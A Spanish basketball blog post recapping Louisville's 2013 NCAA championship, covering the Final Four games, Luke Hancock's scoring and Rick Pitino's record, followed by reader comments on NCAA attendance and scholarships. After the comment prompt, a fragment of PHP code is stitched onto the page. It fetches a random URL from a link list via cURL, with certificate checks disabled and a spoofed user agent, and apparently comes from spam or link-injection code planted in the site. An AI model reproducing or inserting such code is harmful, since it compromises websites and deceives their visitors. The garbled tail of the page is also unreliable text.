Louisville se proclama campeón de la NCAA 2013

09 de April de 2013 por txusma

Pocos días de la liga regular la frenética actividad de la NBA se toma una descanso. Uno de esos días es el de la final del campeonato universitario y es que en EEUU, el baloncesto universitario tiene tantos o más seguidores que la propia NBA. Más de 74000 espectadores se dieron cita en el Georgia Dome de Atlanta para vivir en directo el partido y pudieron presenciar un gran espectáculo. Pero vayamos por partes:

Como pronosticábamos en la previa, Wichita puso en muchos apuros a los Cardinals en el primer partido de las semifinales. De la mano de Cleanthony Early, y a pesar del mal partido de Malcolm Armstead, su mejor hombre hasta la Final Four, los Shockers consiguieron 12 puntos de ventaja ante un equipo en que los titulares no acababan de funcionar y ya se acumulaban los problemas de faltas.  A falta de 13 minutos el partido estaba muy cuesta arriba para Louisville pero aparecieron los secundarios para poner las cosas en su sitio. Tim Henderson anotó 2 triples vitales para mantener con vida a su equipo y Luke Hancock lideró la remontada con 11 puntos de sus 20 puntos totales. En esos últimos 13 minutos Wichita se descompuso: anotó 21 puntos, perdió 7 balones y se quedó en un 41% de acierto mientras que Los Cardinals anotaron 37 puntos con un 57%. Una vez más, la fortaleza mental de los jugadores de Louisville fue decisiva. 

En la otra semifinal se enfrentaban dos estilos antagónicos: la defensa asfixiante de Syracuse contra el juego de ataque de Michigan. Se impusieron los Wolverines a pesar del mal partido de Trey Burke, lo que dice mucho de la calidad de este equipo. Durante la primera parte el balón corrió y a pesar de que varios titulares no estuvieron muy acertados, los de Michigan se fueron al descanso con 11 puntos de ventaja. Los jugadores del banquillo habían cumplido su papel a la perfección anotando en momento claves y aportando los puntos que no llegaban por las vías habituales. Mitch McGary resultó clave en el ataque a la zona de los Orange desde el poste alto y volvió a dejar unas grandes sensaciones. En la 2ª parte el escenario cambió. La defensa de Syracuse comenzó a carburar y a los Wolverines se les hizo de noche. A pesar de que las diferencias se fueron limando poco a poco, los Orange no llegaron nunca a ponerse por delante y Michigan se llevó la victoria y el derecho a jugar la final de la NCAA. Michael Carter-Williams, que tan buenos encuentros venía disputando, estuvo totalmente desaparecido e inconsistente.

Como hemos comentado anteriormente la final fue todo un espectáculo. Muchas veces estos partidos a vida y muerte adolecen de calidad debido al miedo a perder. Esta vez, los 2 equipos nos brindaron un partido lleno de alternativas y con grandes dosis de acierto por ambos bandos. Los Cardinals parece que se han acostumbrado a esto de remontar y de nuevo llegaron a perder por 12 puntos, esta vez a falta de 3 minutos y medio para el descanso. En ese momento volvió a aparecer el que ha sido el protagonista absoluto de esta Final Four, Luke Hancock. El jugador de Lousville anotó 14 puntos en esos 3 minutos y medio con 4 triples de 4 intentos y le dio la vuelta al marcador. Antes, habían sido Trey Burke y un sorprendente Spyke Albrecht los que habían abierto la brecha a favor de los Wolverines. En la 2ª parte, las tablas de los Cardinals, exhibidas en tantos partidos durante el torneo, volvieron a ser claves para llevarse la victoria. Los Peyton Siva, Chane Behanan y Gorgui Dieng amarraron la victoria para los suyos ante el empuje de Trey Burke, que cuajó un gran partido pero no fue suficiente para llevar a los suyos a la victoria. En cambio, Russ Smith supuso más un lastre que una ayuda y completó un fin de semana para olvidar. Por sueret, 27 años después, los Cardinals volvían a ganar el campeonato. Con esta victoria, Rick Pitino se convierte en el primer entrenador que lo gana con 2 equipos diferentes. Casualmente, esta misma semana Pitino ha sido nominado para entrar en el Hall of Fame. ¿Se puede pedir algo más?

Comenta

18 comentarios a esta entrada

  1. Denise dice:
    #1

    74000 espectadores?? Pero que juegan en un estadio de soccer ó futbol americano?

      Citar

  2. Simon dice:
    #2

    Exacto Denise, en el Georgia Domme de Atlanta. jejejej.
    Es increible lo que mueve el deporte universitario en EEUU. Ojalá y en España se montara algun sistema parecido. Aunque eso sería muy complicado dado que no tenemos una cultura deportiva suficiente.

      Citar

  3. Denise dice:
    #3

    Simon: Exacto Denise, en el Georgia Domme de Atlanta. jejejej.Es increible lo que mueve el deporte universitario en EEUU. Ojalá y en España se montara algun sistema parecido. Aunque eso sería muy complicado dado que no tenemos una cultura deportiva suficiente.

    En España…Ni cultura deportiva ni de ninguna clase.
    Además, los propios medios que tienen el poder para llevar la cultura a la gente son los primeros sinverguenzas. Un ejemplo lo tenemos esta noche en el futbol, donde la televisión publica financiada por los habitantes de este pais de pandereta retransmite en abierto un intranscendente Galatasaray-Madrid con la eliminatoria resuelta en vez de una eliminatoria abierta y atractiva como el Dortmund-Málaga. Los aficionados de Málaga y Valencia comprenderán de lo que les hablo, porque han pagado el ninguneo de TVE durante toda la Champions.

      Citar

  4. Futurman dice:
    #4

    Ese último palo es gratuito (en parte) los partidos fueron asignados antes de conocerse los resultados del primer partido. Lo que si reconozco es que la Televisión pública debería encargarse de fomentar deportes minoritarios y no pagar morteradas sacadas de nuestros impuestos por ver fútbol.

      Citar

  5. Jose Luis dice:
    #5

    Vaya final four más mala de Russ Smith, e increíblemente buena la de Hancock, para mí la clave de que los Cardinals se la hayan llevado.

      Citar

  6. Denise dice:
    #6

    Futurman: Ese último palo es gratuito (en parte) los partidos fueron asignados antes de conocerse los resultados del primer partido. Lo que si reconozco es que la Televisión pública debería encargarse de fomentar deportes minoritarios y no pagar morteradas sacadas de nuestros impuestos por ver fútbol.

    No sería la primera vez que se cambia la programación. Aún así al Madrid y Barça lo han echado como 4 ó 5 veces, y al Málaga y al Valencia solo 1, y porque sus partidos no coincidían con los otros 2 grandes.
    Yo es que para la programación que tienen, directamente suprimiria las TV publicas y autonomicas, será que no hay cadenas privadas en abierto con la leche de la TDT, más Internet. Pero bueno, dejo el tema ya, para que Txusma no coja la tijera en plan Mariano y nos elimine los comentarios 🙂

      Citar

  7. txusma dice:
    #7

    A mi el tema me interesa pero no puede ser más offtopic 😀

      Citar

  8. Denise dice:
    #8

    Dejo un articulo que me ha parecido interesante sobre la importancia de la NCAA en EEUU. Para mi que no sigo de cerca esta competición, ni por asomo podía imaginar su repercusión.

    http://www.feb.es/NoticiaDesarrollo.aspx?idNoticia=47036

      Citar

  9. txusma dice:
    #9

    Me acabó de dar cuenta. Luke Hancock es el jugador que aparece en todas las fotos al lado de Kevin Ware tras su tremenda lesión. Oro puro este chaval. Parece como si el destino hubiera querido premiarle por su entereza y empatía.

    http://www.sfexaminer.com/files/blog_images/kevin_ware_0401.jpg

      Citar

  10. Ruxixón dice:
    #10

    Algo permisivos los árbitros con la defensa de Louisville para mi gusto,pero independientemente fueron mejores,hoy y todo el año.LA lucha en el rebote de Benahan y Dieng fue fundamental y de ahí sacó provecho los Cardinals de la mano de SIva.Hancock providencial para liderar la remontada para acabar la primera parte.

    Simon:
    Exacto Denise, en el Georgia Domme de Atlanta. jejejej.
    Es increible lo que mueve el deporte universitario en EEUU. Ojalá y en España se montara algun sistema parecido. Aunque eso sería muy complicado dado que no tenemos una cultura deportiva suficiente.

    Evidentemente existen muchísimas diferencias entre el sistema educativo español y el americano,la primera la facilidad -cada vez menos aquí- para acceder a una universidad,pero el sistema de becas de EEUU donde se premia el esfuerzo es muy bueno y ya ni hablar de todo lo que conlleva la vida universitaria y las facilidades que puedes encontrar después.Aquí aspiras a estar de fiesta padre hasta que llegan los exámenes,ni que hablar si estás de Erasmus.SIempre he envidiado aquello.

    Y ya hablando del ambiente en este tipo de torneos,siempre me ha dado la sensación de que allí la gente es más de universidades que de equipos NBA y eso se nota después en los eventos.Si algún día me lo puedo permitir me gustaría vivir in situ uno de estos,aunque me ha dejado un poco tocado que Ajero en el Plus dijo que la entrada más barata eran 140 $ y la media 620..pensaba que serían más asequibles.

      Citar

  11. Denise dice:
    #11

    Y no creeis que llegará el día en que salga un sindicato de jugadores NCAA (si es que no lo hay ya) pidiendo cobrar. Porque en vista de las cifras que maneja la NCAA, todos se están lucrando excepto los propios protagonistas como son los jugadores.

      Citar

  12. nba dice:
    #12

    Denise:
    Y no creeis que llegará el día en que salga un sindicato de jugadores NCAA (si es que no lo hay ya) pidiendo cobrar. Porque en vista de las cifras que maneja la NCAA, todos se están lucrando excepto los propios protagonistas como son los jugadores.

    Yo diria que ellos tambien obtienen beneficio aunque no sea de manera inmediata, subir en los drafts, y tener la posibilidad de sacarse un titulo universitario

      Citar

  13. safd dice:
    #13

    Denise:
    Y no creeis que llegará el día en que salga un sindicato de jugadores NCAA (si es que no lo hay ya) pidiendo cobrar. Porque en vista de las cifras que maneja la NCAA, todos se están lucrando excepto los propios protagonistas como son los jugadores.

    No…

    Las becas que consiguen ya me parece un mas que mejor sueldo… ellos se tienen que centrar en formarse academicamente y jugar… tenemos que pensar que en la DI habia mas de 4000 jugadores creo, y no todos van a llegar a superestrellas y ganar millones, solo unos poquitos poquitos.

      Citar

  14. Lucho dice:
    #14

    NYK 9/12 triples en el 1er cuarto

      Citar

  15. Simon dice:
    #15

    safd: No…

    Las becas que consiguen ya me parece un mas que mejor sueldo… ellos se tienen que centrar en formarse academicamente y jugar… tenemos que pensar que en la DI habia mas de 4000 jugadores creo, y no todos van a llegar a superestrellas y ganar millones, solo unos poquitos poquitos.

    Por curiosidad a cuanto pueden ascender esas becas?? Yo pensaba que simplemente eran estudios pagados + alojamiento + todo tipo de servicios pero lo que es en dinero liquido pensaba que no.

      Citar

  16. txusma dice:
    #16

    Simon: Por curiosidad a cuanto pueden ascender esas becas?? Yo pensaba que simplemente eran estudios pagados + alojamiento + todo tipo de servicios pero lo que es en dinero liquido pensaba que no.

    Las becas te lo pagan todo y eso puede ser algo así como 42000 dólares en una universidad como Butler. Pero a parte de eso lo importante es que reciben entrenamiento de calidad, tanto físico como táctico y técnico, seguro médico, curos de formación, etc…

    Vamos que yo creo q no se pueden quejar, no.

      Citar

  17. Heineken dice:
    #17

    Reciben todo tipo de ayudas (también académicas, como tutores personales), pero nunca jamás dinero en efectivo o cosas del tipo “un coche, una moto, etc” porque en cuanto cobras algo no puedes jugar en la NCAA y además pueden sancionar a la Universidad de forma importante. En cuanto cobras dejas de ser amateur.

      Citar

  18. Simon dice:
    #18

    Heineken:
    Reciben todo tipo de ayudas (también académicas, como tutores personales), pero nunca jamás dinero en efectivo o cosas del tipo “un coche, una moto, etc” porque en cuanto cobras algo no puedes jugar en la NCAA y además pueden sancionar a la Universidad de forma importante. En cuanto cobras dejas de ser amateur.

    vale eso a es lo que yo tenía pensado. Ayudas y recursos materiales casi infinitos pero nada de dinero liquido. Es que en algunos comentarios de mas arriba me había parecido entender que las becas que les daban era al estilo España ( te cascan la pasta y tu ya haces lo que quieras ) cuando yo siempre había entendido que el sistema es como tu dices por eso preguntaba.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>